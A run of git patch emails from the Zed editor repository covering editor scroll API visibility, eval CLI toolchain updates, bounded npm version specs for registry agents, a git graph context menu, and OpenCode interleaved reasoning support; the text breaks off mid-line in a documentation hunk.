937bc396c923bab3e7bcb8b60bb70a3de67b1485 Mon Sep 17 00:00:00 2001 From: Finn Evers Date: Tue, 5 May 2026 15:01:02 +0200 Subject: [PATCH 192/231] editor: Un-pub `ScrollManager` (#55767) Make this only pub(crate) in preparation for https://github.com/zed-industries/zed/pull/44827 Release Notes: - N/A --- crates/agent_ui/src/entry_view_state.rs | 2 +- crates/agent_ui/src/inline_assistant.rs | 2 +- crates/editor/src/editor.rs | 7 ++++++- crates/editor/src/scroll.rs | 8 ++++++++ crates/vim/src/normal/scroll.rs | 8 ++------ 5 files changed, 18 insertions(+), 9 deletions(-) diff --git a/crates/agent_ui/src/entry_view_state.rs b/crates/agent_ui/src/entry_view_state.rs index 853672142fb843..15bd9e89b57821 100644 --- a/crates/agent_ui/src/entry_view_state.rs +++ b/crates/agent_ui/src/entry_view_state.rs @@ -449,7 +449,7 @@ fn create_editor_diff( editor.set_show_vertical_scrollbar(false, cx); editor.set_minimap_visibility(MinimapVisibility::Disabled, window, cx); editor.set_soft_wrap_mode(SoftWrap::None, cx); - editor.scroll_manager.set_forbid_vertical_scroll(true); + editor.set_forbid_vertical_scroll(true); editor.set_show_indent_guides(false, cx); editor.set_read_only(true); editor.set_delegate_open_excerpts(true); diff --git a/crates/agent_ui/src/inline_assistant.rs b/crates/agent_ui/src/inline_assistant.rs index cdff9785df78b1..d442a61e01ae1d 100644 --- a/crates/agent_ui/src/inline_assistant.rs +++ b/crates/agent_ui/src/inline_assistant.rs @@ -1425,7 +1425,7 @@ impl InlineAssistant { editor.set_show_gutter(false, cx); editor.set_offset_content(false, cx); editor.disable_mouse_wheel_zoom(); - editor.scroll_manager.set_forbid_vertical_scroll(true); + editor.set_forbid_vertical_scroll(true); editor.set_read_only(true); editor.set_show_edit_predictions(Some(false), window, cx); editor.highlight_rows::( diff --git a/crates/editor/src/editor.rs b/crates/editor/src/editor.rs index af8d6f6ccc6931..d9dd6078c08953 100644 --- a/crates/editor/src/editor.rs +++ b/crates/editor/src/editor.rs @@ -1157,7 +1157,12 @@ pub struct Editor { pub display_map: Entity, placeholder_display_map: Option>, pub selections: SelectionsCollection, - pub scroll_manager: ScrollManager, + /// Manages the scroll position for the given editor. + /// + /// Whenever you want to modify the scroll position of the editor, you should + /// usually use the existing available APIs as opposed to directly interacting + /// with the scroll manager. + pub(crate) scroll_manager: ScrollManager, /// When inline assist editors are linked, they all render cursors because /// typing enters text into each of them, even the ones that aren't focused. pub(crate) show_cursor_when_unfocused: bool, diff --git a/crates/editor/src/scroll.rs b/crates/editor/src/scroll.rs index 143a73fd701ac9..f067519e7343f8 100644 --- a/crates/editor/src/scroll.rs +++ b/crates/editor/src/scroll.rs @@ -623,6 +623,14 @@ impl Editor { self.scroll_manager.has_autoscroll_request() } + pub fn set_forbid_vertical_scroll(&mut self, forbid: bool) { + self.scroll_manager.set_forbid_vertical_scroll(forbid); + } + + pub fn scroll_top_display_point(&self, snapshot: &DisplaySnapshot, cx: &App) -> DisplayPoint { + self.scroll_manager.scroll_top_display_point(snapshot, cx) + } + pub fn vertical_scroll_margin(&self) -> usize { self.scroll_manager.vertical_scroll_margin as usize } diff --git a/crates/vim/src/normal/scroll.rs b/crates/vim/src/normal/scroll.rs index 01719cd59325f3..befaacf31c7dac 100644 --- a/crates/vim/src/normal/scroll.rs +++ b/crates/vim/src/normal/scroll.rs @@ -109,9 +109,7 @@ impl Vim { self.update_editor(cx, |vim, editor, cx| { let should_move_cursor = editor.newest_selection_on_screen(cx).is_eq(); let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let old_top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); + let old_top = editor.scroll_top_display_point(&display_snapshot, cx); if editor.scroll_hover(amount, window, cx) { return; @@ -143,9 +141,7 @@ impl Vim { }; let display_snapshot = editor.display_map.update(cx, |map, cx| map.snapshot(cx)); - let top = editor - .scroll_manager - .scroll_top_display_point(&display_snapshot, cx); + let top = editor.scroll_top_display_point(&display_snapshot, cx); let vertical_scroll_margin = EditorSettings::get_global(cx).vertical_scroll_margin; let mut move_cursor = |map: &editor::display_map::DisplaySnapshot, From e0b8fcecd56df17348a6f407273e07c74777b353 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 15:40:58 +0200 Subject: [PATCH 193/231] eval_cli: Update eval_cli toolchain and pin harbor (#55768) Move `git_ui` to `agent_ui` test dependencies and bump the eval CLI Docker image to Rust 1.95.0 while pinning the Python `harbor` dependency to 0.6.4 Release Notes: - N/A --- crates/agent_ui/Cargo.toml | 2 +- crates/eval_cli/.gitignore | 1 + crates/eval_cli/Dockerfile | 4 ++-- crates/eval_cli/zed_eval/pyproject.toml | 2 +- 4 files changed, 5 insertions(+), 4 deletions(-) diff --git a/crates/agent_ui/Cargo.toml b/crates/agent_ui/Cargo.toml index 5f5a7cc7926ff5..ff34593cbc3bfa 100644 --- a/crates/agent_ui/Cargo.toml +++ b/crates/agent_ui/Cargo.toml @@ -56,7 +56,6 @@ file_icons.workspace = true fs.workspace = true futures.workspace = true git.workspace = true -git_ui.workspace = true fuzzy.workspace = true gpui.workspace = true gpui_tokio.workspace = true @@ -124,6 +123,7 @@ clock = { workspace = true, features = ["test-support"] } db = { workspace = true, features = ["test-support"] } editor = { workspace = true, features = ["test-support"] } eval_utils.workspace = true +git_ui.workspace = true gpui = { workspace = true, "features" = ["test-support"] } http_client = { workspace = true, features = ["test-support"] } indoc.workspace = true diff --git a/crates/eval_cli/.gitignore b/crates/eval_cli/.gitignore index 083ef6e3d354cb..a6317b892a1a0a 100644 --- a/crates/eval_cli/.gitignore +++ b/crates/eval_cli/.gitignore @@ -1,3 +1,4 @@ **/jobs **/*.egg-info **/__pycache__ +uv.lock diff --git a/crates/eval_cli/Dockerfile b/crates/eval_cli/Dockerfile index 06593a124fe61c..9782e5982b95cb 100644 --- a/crates/eval_cli/Dockerfile +++ b/crates/eval_cli/Dockerfile @@ -7,12 +7,12 @@ # Or use the helper script: # crates/eval_cli/script/build-linux -FROM rust:1.94.1 AS builder +FROM rust:1.95.0 AS builder WORKDIR /app # Pre-install the toolchain specified in rust-toolchain.toml so it is cached. -RUN rustup toolchain install 1.94.1 --profile minimal \ +RUN rustup toolchain install 1.95.0 --profile minimal \ --component rustfmt --component clippy --component rust-analyzer --component rust-src \ --target wasm32-wasip2 --target wasm32-unknown-unknown --target x86_64-unknown-linux-musl --target x86_64-unknown-linux-gnu diff --git a/crates/eval_cli/zed_eval/pyproject.toml b/crates/eval_cli/zed_eval/pyproject.toml index 416c025826eaf9..10e72028a5e7d8 100644 --- a/crates/eval_cli/zed_eval/pyproject.toml +++ b/crates/eval_cli/zed_eval/pyproject.toml @@ -3,7 +3,7 @@ name = "zed-eval" version = "0.1.0" description = "Harbor agent wrapper for Zed's eval-cli" requires-python = ">=3.12" -dependencies = ["harbor"] +dependencies = ["harbor==0.6.4"] [build-system] requires = ["setuptools"] From 6da324248abc8f5fbfc6a4a7976e282a5d635b90 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 16:12:43 +0200 Subject: [PATCH 194/231] acp: Allow resolving older npm package versions (#55770) Lots of people are using `min-release-age` in their .npmrc files these days. I saw two options: 1. Force min-release-age=0 so we can always install the latest 2. Be more lenient in what we allow I opted for 2, which means we convert `package@0.1.2` to `package@<=0.1.2`. This means npm can find the latest version we can that meets the user's requirements. The downside is, the registry args/env may or may not work with the resolved version, but that should at least surface better thanks to #55757 There is also the issue that npm will cache package metadata and an older version it has cached would still resolve. However, once the metadata is updated, npm does use the newer tarball at least, so it will update eventually. It's a tradeoff, but I'd rather start with this until we have a better solution on the ACP registry, rather than have users be upset becaue we installed packages in a way they didn't want. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes https://github.com/agentclientprotocol/claude-agent-acp/issues/516 Release Notes: - acp: Better support min-release-age settings for npx-based agents from the registry --- crates/project/src/agent_server_store.rs | 49 +++++++++++++++++++++++- 1 file changed, 47 insertions(+), 2 deletions(-) diff --git a/crates/project/src/agent_server_store.rs b/crates/project/src/agent_server_store.rs index 103a44197aefd0..cdde687ec63233 100644 --- a/crates/project/src/agent_server_store.rs +++ b/crates/project/src/agent_server_store.rs @@ -18,6 +18,7 @@ use rpc::{ proto::{self, ExternalExtensionAgent}, }; use schemars::JsonSchema; +use semver::Version; use serde::{Deserialize, Serialize}; use settings::{RegisterSetting, SettingsStore}; use sha2::{Digest, Sha256}; @@ -1535,7 +1536,7 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { let node_runtime = self.node_runtime.clone(); let project_environment = self.project_environment.downgrade(); let registry_id = self.registry_id.clone(); - let package = self.package.clone(); + let package = bounded_npm_package_spec(&self.package); let args = self.args.clone(); let distribution_env = self.distribution_env.clone(); let settings_env = self.settings_env.clone(); @@ -1554,7 +1555,7 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { .join(sanitize_path_component(®istry_id)); fs.create_dir(&prefix_dir).await?; - let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()]; + let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package]; exec_args.extend(args); let npm_command = node_runtime @@ -1592,6 +1593,30 @@ impl ExternalAgentServer for LocalRegistryNpxAgent { } } +/// People are using min-release-age more frequently. Which means a fresh registry will likely have +/// new package versions than the user can install. +/// We set the version to now be a ceiling and not an exact pin instead. This allows npm to resolve +/// the latest version it can find that satisfies the constraint. npm seems to check regularly enough +/// that new versions are available. This does have a few downsides: +/// - The user might have an older cached version of the package that satisfies the constraint, until +/// npm checks for updates again. +/// - The registry args/env may not be valid for the resolved version. +/// +/// This is a best-effort attempt to install a version that works without overriding the user's +/// security settings, as the args don't change often. The registry will need to support this better +/// at some point, but until then, this is a best-effort workaround that hopefully solves the issue +/// for most users. +fn bounded_npm_package_spec(package_spec: &str) -> String { + let Some((package_name, version)) = package_spec.rsplit_once('@') else { + return package_spec.to_string(); + }; + if package_name.is_empty() || Version::parse(version).is_err() { + return package_spec.to_string(); + } + + format!("{package_name}@<={version}") +} + struct LocalCustomAgent { project_environment: Entity, command: AgentServerCommand, @@ -1996,6 +2021,26 @@ mod tests { }) } + #[test] + fn builds_bounded_npm_package_specs() { + assert_eq!( + bounded_npm_package_spec("agent-package@1.2.3"), + "agent-package@<=1.2.3" + ); + assert_eq!( + bounded_npm_package_spec("@scope/agent-package@1.2.3-beta.1"), + "@scope/agent-package@<=1.2.3-beta.1" + ); + assert_eq!( + bounded_npm_package_spec("@scope/agent-package"), + "@scope/agent-package" + ); + assert_eq!( + bounded_npm_package_spec("agent-package@latest"), + "agent-package@latest" + ); + } + #[test] fn detects_supported_archive_suffixes() { assert!(matches!( From b2168bcfee1b1402106607ee7688a3d42ec5f923 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Tue, 5 May 2026 10:22:50 -0400 Subject: [PATCH 195/231] Add an initial context menu to the git graph entrees (#55720) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR adds an initial context menu to the git graph entries. There are a bunch of commit-specific actions we will likely want to add here over time (e.g. create a branch at this commit, revert, etc.), but for this PR, it only exposes the actions that were already available from the commit details panel: `Copy SHA` and `View Commit`. We will also need a context menu to land a future want of mine: custom git command support in the git graph. This was a bit trickier than a normal context menu addition because the git graph uses the selected entry to drive the commit details panel. If right-clicking a row went through the normal selection path, it would also pop open the commit details panel if it was closed, or change the commit currently being shown if it was already open. I don’t think right-clicking to open a context menu should do either of those things. The context menu target and the commit details panel should be independent of one another. To support that, this PR introduces `GitGraphContextMenu`. Most of this state was already present as a tuple for rendering a context menu, but it wasn’t wired up to graph rows. I pulled that state into its own type and added an `entry_idx` field to track which row the context menu was opened on. This lets the row highlight while the menu is open without changing the selected commit or opening the details panel. This also suppresses the commit subject tooltip while the context menu is open, matching the pattern used elsewhere to avoid tooltips appearing on top of context menus. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added a context menu the git graph entrees --- crates/git_graph/src/git_graph.rs | 230 +++++++++++++++++++++++++++--- 1 file changed, 208 insertions(+), 22 deletions(-) diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index 5a7e7a30294236..73ad9293e17318 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -11,9 +11,10 @@ use git::{ }; use git_ui::{commit_tooltip::CommitAvatar, commit_view::CommitView, git_status_icon}; use gpui::{ - Anchor, AnyElement, App, Bounds, ClickEvent, ClipboardItem, DefiniteLength, DragMoveEvent, - ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, Hsla, PathBuilder, Pixels, - Point, ScrollStrategy, ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, + Action, Anchor, AnyElement, App, Bounds, ClickEvent, ClipboardItem, DefiniteLength, + DismissEvent, DragMoveEvent, ElementId, Empty, Entity, EventEmitter, FocusHandle, Focusable, + Hsla, MouseButton, MouseDownEvent, PathBuilder, Pixels, Point, ScrollStrategy, + ScrollWheelEvent, SharedString, Subscription, Task, TextStyleRefinement, UniformListScrollHandle, WeakEntity, Window, actions, anchored, deferred, point, prelude::*, px, uniform_list, }; @@ -278,6 +279,8 @@ impl SplitState { actions!( git_graph, [ + /// Copies the SHA of the selected commit to the clipboard. + CopyCommitSha, /// Opens the commit view for the selected commit. OpenCommitView, /// Focuses the search field. @@ -981,13 +984,20 @@ fn compute_diff_stats(diff: &CommitDiff) -> (usize, usize) { }) } +struct GitGraphContextMenu { + menu: Entity, + position: Point, + entry_idx: usize, + _subscription: Subscription, +} + pub struct GitGraph { focus_handle: FocusHandle, search_state: SearchState, graph_data: GraphData, git_store: Entity, workspace: WeakEntity, - context_menu: Option<(Entity, Point, Subscription)>, + context_menu: Option, table_interaction_state: Entity, column_widths: Entity, selected_entry_idx: Option, @@ -1010,6 +1020,7 @@ impl GitGraph { self.search_state.matches.clear(); self.search_state.selected_index = None; self.search_state.state.next_state(); + self.context_menu = None; cx.emit(ItemEvent::Edit); cx.notify(); } @@ -1328,6 +1339,10 @@ impl GitGraph { git_store.repositories().get(&self.repo_id).cloned() } + fn has_context_menu(&self) -> bool { + self.context_menu.is_some() + } + /// Checks whether a ref name from git's `%D` decoration /// format refers to the currently checked-out branch. fn is_head_ref(ref_name: &str, head_branch_name: &Option) -> bool { @@ -1374,6 +1389,7 @@ impl GitGraph { }); let row_height = Self::row_height(window, cx); + let has_context_menu = self.has_context_menu(); // We fetch data outside the visible viewport to avoid loading entries when // users scroll through the git graph @@ -1481,7 +1497,9 @@ impl GitGraph { div() .id(ElementId::NamedInteger("commit-subject".into(), idx as u64)) .overflow_hidden() - .tooltip(Tooltip::text(subject)) + .when(!has_context_menu, |this| { + this.tooltip(Tooltip::text(subject)) + }) .child( h_flex() .gap_2() @@ -1851,6 +1869,96 @@ impl GitGraph { ); } + fn copy_commit_sha(&mut self, entry_index: usize, cx: &mut Context) { + let Some(commit) = self.graph_data.commits.get(entry_index) else { + return; + }; + cx.write_to_clipboard(ClipboardItem::new_string(commit.data.sha.to_string())); + } + + fn copy_selected_commit_sha( + &mut self, + _: &CopyCommitSha, + _: &mut Window, + cx: &mut Context, + ) { + let Some(selected_entry_index) = self.selected_entry_idx else { + return; + }; + self.copy_commit_sha(selected_entry_index, cx); + } + + fn deploy_entry_context_menu( + &mut self, + position: Point, + index: usize, + window: &mut Window, + cx: &mut Context, + ) { + let Some(commit) = self.graph_data.commits.get(index) else { + return; + }; + let short_sha = commit.data.sha.display_short(); + + let focus_handle = self.focus_handle.clone(); + let git_graph = cx.entity(); + let context_menu = ContextMenu::build(window, cx, |context_menu, window, _| { + context_menu + .context(focus_handle) + .header(format!("Commit {short_sha}")) + .entry( + "View Commit", + Some(OpenCommitView.boxed_clone()), + window.handler_for(&git_graph, move |this, window, cx| { + this.open_commit_view(index, window, cx); + }), + ) + .entry( + "Copy SHA", + Some(CopyCommitSha.boxed_clone()), + window.handler_for(&git_graph, move |this, _window, cx| { + this.copy_commit_sha(index, cx); + }), + ) + }); + self.set_context_menu(context_menu, position, index, window, cx); + } + + fn set_context_menu( + &mut self, + context_menu: Entity, + position: Point, + entry_idx: usize, + window: &mut Window, + cx: &mut Context, + ) { + window.focus(&context_menu.focus_handle(cx), cx); + + let subscription = cx.subscribe_in( + &context_menu, + window, + |this, _, _: &DismissEvent, window, cx| { + if this.context_menu.as_ref().is_some_and(|context_menu| { + context_menu + .menu + .focus_handle(cx) + .contains_focused(window, cx) + }) { + cx.focus_self(window); + } + this.context_menu.take(); + cx.notify(); + }, + ); + self.context_menu = Some(GitGraphContextMenu { + menu: context_menu, + position, + entry_idx, + _subscription: subscription, + }); + cx.notify(); + } + fn get_remote( &self, repository: &Repository, @@ -2434,6 +2542,7 @@ impl GitGraph { let hovered_entry_idx = self.hovered_entry_idx; let selected_entry_idx = self.selected_entry_idx; + let context_menu_entry_idx = self.context_menu.as_ref().map(|menu| menu.entry_idx); let is_focused = self.focus_handle.is_focused(window); let graph_canvas_bounds = self.graph_canvas_bounds.clone(); @@ -2456,8 +2565,10 @@ impl GitGraph { let absolute_row_idx = first_visible_row + visible_row_idx; let is_hovered = hovered_entry_idx == Some(absolute_row_idx); let is_selected = selected_entry_idx == Some(absolute_row_idx); + let is_context_menu_target = + context_menu_entry_idx == Some(absolute_row_idx); - if is_hovered || is_selected { + if is_hovered || is_selected || is_context_menu_target { let row_y = bounds.origin.y + visible_row_idx as f32 * row_height - vertical_scroll_offset; @@ -2469,7 +2580,11 @@ impl GitGraph { }, ); - let bg_color = if is_selected { selected_bg } else { hover_bg }; + let bg_color = if is_selected || is_context_menu_target { + selected_bg + } else { + hover_bg + }; window.paint_quad(gpui::fill(row_bounds, bg_color)); } } @@ -2697,6 +2812,31 @@ impl GitGraph { } } + fn handle_entry_click( + &mut self, + entry_idx: usize, + event: &ClickEvent, + scroll_strategy: ScrollStrategy, + focus_handle: Option<&FocusHandle>, + window: &mut Window, + cx: &mut Context, + ) { + // Right-clicks open the context menu, not the details panel. + if event.is_right_click() { + return; + } + + if let Some(focus_handle) = focus_handle { + focus_handle.focus(window, cx); + } + + self.select_entry(entry_idx, scroll_strategy, cx); + + if event.click_count() >= 2 { + self.open_commit_view(entry_idx, window, cx); + } + } + fn handle_graph_click( &mut self, event: &ClickEvent, @@ -2704,13 +2844,34 @@ impl GitGraph { cx: &mut Context, ) { if let Some(row) = self.row_at_position(event.position().y, window, cx) { - self.select_entry(row, ScrollStrategy::Nearest, cx); - if event.click_count() >= 2 { - self.open_commit_view(row, window, cx); - } + self.handle_entry_click(row, event, ScrollStrategy::Nearest, None, window, cx); } } + fn handle_entry_secondary_mouse_down( + &mut self, + entry_idx: usize, + event: &MouseDownEvent, + window: &mut Window, + cx: &mut Context, + ) { + self.deploy_entry_context_menu(event.position, entry_idx, window, cx); + cx.stop_propagation(); + } + + fn handle_graph_secondary_mouse_down( + &mut self, + event: &MouseDownEvent, + window: &mut Window, + cx: &mut Context, + ) { + let Some(row) = self.row_at_position(event.position.y, window, cx) else { + return; + }; + + self.handle_entry_secondary_mouse_down(row, event, window, cx); + } + fn handle_graph_scroll( &mut self, event: &ScrollWheelEvent, @@ -2905,6 +3066,8 @@ impl Render for GitGraph { let row_height = Self::row_height(window, cx); let selected_entry_idx = self.selected_entry_idx; let hovered_entry_idx = self.hovered_entry_idx; + let context_menu_entry_idx = + self.context_menu.as_ref().map(|menu| menu.entry_idx); let weak_self = cx.weak_entity(); let focus_handle = self.focus_handle.clone(); let table_focus_handle = @@ -2923,6 +3086,10 @@ impl Render for GitGraph { .on_scroll_wheel(cx.listener(Self::handle_graph_scroll)) .on_mouse_move(cx.listener(Self::handle_graph_mouse_move)) .on_click(cx.listener(Self::handle_graph_click)) + .on_mouse_down( + MouseButton::Right, + cx.listener(Self::handle_graph_secondary_mouse_down), + ) .on_hover(cx.listener(|this, &is_hovered: &bool, _, cx| { if !is_hovered && this.hovered_entry_idx.is_some() { this.hovered_entry_idx = None; @@ -2938,11 +3105,14 @@ impl Render for GitGraph { .map_row(move |(index, row), window, cx| { let is_selected = selected_entry_idx == Some(index); let is_hovered = hovered_entry_idx == Some(index); + let is_context_menu_target = + context_menu_entry_idx == Some(index); let table_focus_handle = table_focus_handle.clone(); let is_focused = focus_handle.is_focused(window) || table_focus_handle.is_focused(window); let weak = weak_self.clone(); let weak_for_hover = weak.clone(); + let weak_for_context_menu = weak.clone(); let hover_bg = cx.theme().colors().element_hover.opacity(0.6); let selected_bg = if is_focused { @@ -2953,8 +3123,13 @@ impl Render for GitGraph { row.h(row_height) .cursor_pointer() - .when(is_selected, |row| row.bg(selected_bg)) - .when(is_hovered && !is_selected, |row| row.bg(hover_bg)) + .when(is_selected || is_context_menu_target, |row| { + row.bg(selected_bg) + }) + .when( + is_hovered && !is_selected && !is_context_menu_target, + |row| row.bg(hover_bg), + ) .on_hover(move |&is_hovered, _, cx| { weak_for_hover .update(cx, |this, cx| { @@ -2972,20 +3147,30 @@ impl Render for GitGraph { .ok(); }) .on_click(move |event, window, cx| { - let click_count = event.click_count(); - table_focus_handle.focus(window, cx); weak.update(cx, |this, cx| { - this.select_entry( + this.handle_entry_click( index, + event, ScrollStrategy::Center, + Some(&table_focus_handle), + window, cx, ); - if click_count >= 2 { - this.open_commit_view(index, window, cx); - } }) .ok(); }) + .on_mouse_down( + MouseButton::Right, + move |event: &MouseDownEvent, window, cx| { + weak_for_context_menu + .update(cx, |this, cx| { + this.handle_entry_secondary_mouse_down( + index, event, window, cx, + ); + }) + .ok(); + }, + ) .into_any_element() }) .uniform_list( @@ -3057,6 +3242,7 @@ impl Render for GitGraph { .on_action(cx.listener(|this, _: &OpenCommitView, window, cx| { this.open_selected_commit_view(window, cx); })) + .on_action(cx.listener(Self::copy_selected_commit_sha)) .on_action(cx.listener(Self::cancel)) .on_action(cx.listener(|this, _: &FocusSearch, window, cx| { this.search_state @@ -3091,12 +3277,12 @@ impl Render for GitGraph { .child(self.render_search_bar(cx)) .child(div().flex_1().child(content)), ) - .children(self.context_menu.as_ref().map(|(menu, position, _)| { + .children(self.context_menu.as_ref().map(|context_menu| { deferred( anchored() - .position(*position) + .position(context_menu.position) .anchor(Anchor::TopLeft) - .child(menu.clone()), + .child(context_menu.menu.clone()), ) .with_priority(1) })) From ec5e6d92723a48acbf6fc014d4918104d65322f4 Mon Sep 17 00:00:00 2001 From: Vlad Ionescu Date: Tue, 5 May 2026 17:30:17 +0300 Subject: [PATCH 196/231] opencode: Support interleaved_reasoning and fix DeepSeek (#55574) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit OpenCode API endpoints for DeepSeek were [moved from Anthropic-compatible to OpenAI-compatible](https://github.com/anomalyco/opencode/pull/24500) and DeepSeek requires interleaved reasoning enabled to work. I ran a _"rename this variable to potato"_ test and I can confirm DeepSeek V4 Flash and Pro both work now 🎉 Some other OpenCode Go models were marked [on models.dev](https://github.com/anomalyco/models.dev/tree/dev/providers/opencode-go/models) as supporting `interleaved_reasoning` so they too got that enabled. Kimi K2.5 and Kimi K2.6 continue to fail with https://github.com/zed-industries/zed/issues/51743 (https://github.com/zed-industries/zed/pull/55085 seems to hint at this being [an OpenCode issue](https://github.com/zed-industries/zed/issues/51743#issuecomment-4336785765)?), but all other models seem to work fine both with `interleaved_reasoning` and without it 🤷 I assume it's better to have that turned on? Again, the intersection of OpenAI Chat Completions API, different models, different inference providers, how they all work together is something I know nothing about! Self-Review Checklist: - [X] I've reviewed my own diff for quality, security, and reliability - [X] Unsafe blocks (if any) have justifying comments - [X] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [X] Performance impact has been considered and is acceptable Release Notes: - OpenCode Go: use correct DeepSeek endpoints - OpenCode: add support for interleaved_reasoning --- .../language_models/src/provider/opencode.rs | 3 +- crates/opencode/src/opencode.rs | 35 ++++++++++++++----- crates/settings_content/src/language_model.rs | 3 ++ docs/src/ai/llm-providers.md | 2 ++ 4 files changed, 34 insertions(+), 9 deletions(-) diff --git a/crates/language_models/src/provider/opencode.rs b/crates/language_models/src/provider/opencode.rs index 6c0d4a5d3fe1b8..4380d2e1a13c1f 100644 --- a/crates/language_models/src/provider/opencode.rs +++ b/crates/language_models/src/provider/opencode.rs @@ -278,6 +278,7 @@ impl LanguageModelProvider for OpenCodeLanguageModelProvider { protocol, reasoning_effort_levels: model.reasoning_effort_levels.clone(), custom_model_api_url: model.custom_model_api_url.clone(), + interleaved_reasoning: model.interleaved_reasoning, }; let key = format!("{}/{}", subscription.id_prefix(), model.name); models.insert(key, (custom_model, subscription)); @@ -664,7 +665,7 @@ impl LanguageModel for OpenCodeLanguageModel { false, self.model.max_output_tokens(), reasoning_effort, - false, + self.model.interleaved_reasoning(), ); let stream = self.stream_openai_chat(openai_request, http_client, cx); async move { diff --git a/crates/opencode/src/opencode.rs b/crates/opencode/src/opencode.rs index 5ac344110115f7..9563b77611a3a0 100644 --- a/crates/opencode/src/opencode.rs +++ b/crates/opencode/src/opencode.rs @@ -168,6 +168,7 @@ pub enum Model { protocol: ApiProtocol, reasoning_effort_levels: Option>, custom_model_api_url: Option, + interleaved_reasoning: bool, }, } @@ -385,8 +386,6 @@ impl Model { Self::Gemini3_1Pro | Self::Gemini3Flash => ApiProtocol::Google, - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => ApiProtocol::Anthropic, - Self::MiniMaxM2_5Free | Self::Glm5 | Self::Glm5_1 @@ -398,6 +397,8 @@ impl Model { | Self::MimoV2_5 | Self::Qwen3_5Plus | Self::Qwen3_6Plus + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash | Self::BigPickle | Self::Nemotron3SuperFree | Self::Ling2_6FlashFree @@ -407,6 +408,27 @@ impl Model { } } + pub fn interleaved_reasoning(&self) -> bool { + match self { + Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash + | Self::KimiK2_5 + | Self::KimiK2_6 + | Self::MimoV2Omni + | Self::MimoV2_5 + | Self::MimoV2_5Pro + | Self::Glm5 + | Self::Glm5_1 => true, + + Self::Custom { + interleaved_reasoning, + .. + } => *interleaved_reasoning, + + _ => false, + } + } + pub fn max_token_count(&self) -> u64 { match self { // Anthropic models @@ -487,9 +509,6 @@ impl Model { // Google models Self::Gemini3_1Pro | Self::Gemini3Flash => Some(65_536), - // Anthropic-compatible models - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), - // OpenAI-compatible models Self::MiniMaxM2_7 => Some(131_072), Self::MiniMaxM2_5 | Self::MiniMaxM2_5Free => Some(131_072), @@ -497,6 +516,7 @@ impl Model { Self::BigPickle => Some(128_000), Self::KimiK2_6 | Self::KimiK2_5 => Some(65_536), Self::Qwen3_5Plus | Self::Qwen3_6Plus => Some(65_536), + Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => Some(384_000), Self::Nemotron3SuperFree => Some(128_000), Self::MimoV2_5Pro | Self::MimoV2_5 | Self::MimoV2Pro | Self::MimoV2Omni => { Some(128_000) @@ -565,14 +585,13 @@ impl Model { | Self::MiniMaxM2_7 | Self::MimoV2Pro | Self::MimoV2_5Pro + | Self::DeepSeekV4Pro + | Self::DeepSeekV4Flash | Self::BigPickle | Self::Nemotron3SuperFree | Self::Ling2_6FlashFree | Self::Hy3PreviewFree => false, - // DeepSeek models (Anthropic protocol) don't support images - Self::DeepSeekV4Pro | Self::DeepSeekV4Flash => false, - Self::Custom { protocol, .. } => matches!( protocol, ApiProtocol::Anthropic diff --git a/crates/settings_content/src/language_model.rs b/crates/settings_content/src/language_model.rs index 0fe922ae0b881e..469be983f0f545 100644 --- a/crates/settings_content/src/language_model.rs +++ b/crates/settings_content/src/language_model.rs @@ -181,6 +181,9 @@ pub struct OpenCodeAvailableModel { pub custom_model_api_url: Option, /// Supported reasoning effort levels, for example `["low", "medium", "high"]. pub reasoning_effort_levels: Option>, + /// When using OpenAiChat protocol, whether thinking tokens are sent as a dedicated `reasoning_content` field or inline in message text. + #[serde(default)] + pub interleaved_reasoning: bool, } #[with_fallible_options] diff --git a/docs/src/ai/llm-providers.md b/docs/src/ai/llm-providers.md index b5dd98afe1a6b6..b32c433803f6cd 100644 --- a/docs/src/ai/llm-providers.md +++ b/docs/src/ai/llm-providers.md @@ -663,6 +663,7 @@ The Zed agent comes pre-configured with OpenCode models. If you wish to use newe "max_output_tokens": 98765, "protocol": "openai_chat", "reasoning_effort_levels": ["low", "medium", "high"], + "interleaved_reasoning": false, "subscription": "go", "custom_model_api_url": "https://example.com/zen" } @@ -680,6 +681,7 @@ The available configuration options for custom models are: - `max_output_tokens` (optional): maximum tokens the model can generate, for example `64000` - `protocol` (required): model API protocol, one of `"anthropic"`, `"openai_responses"`, `"openai_chat"`, or `"google"` - `reasoning_effort_levels` (optional): list of supported reasoning effort levels, for example `["low", "medium", "high"]`. The latest value in the list is used as the default +- `interleaved_reasoning` (optional, default `false`): if thinking tokens are sent as a dedicated `reasoning_content` field (`true`) or inline in message text (`false`). Applies only when using the `openai_chat` protocol - 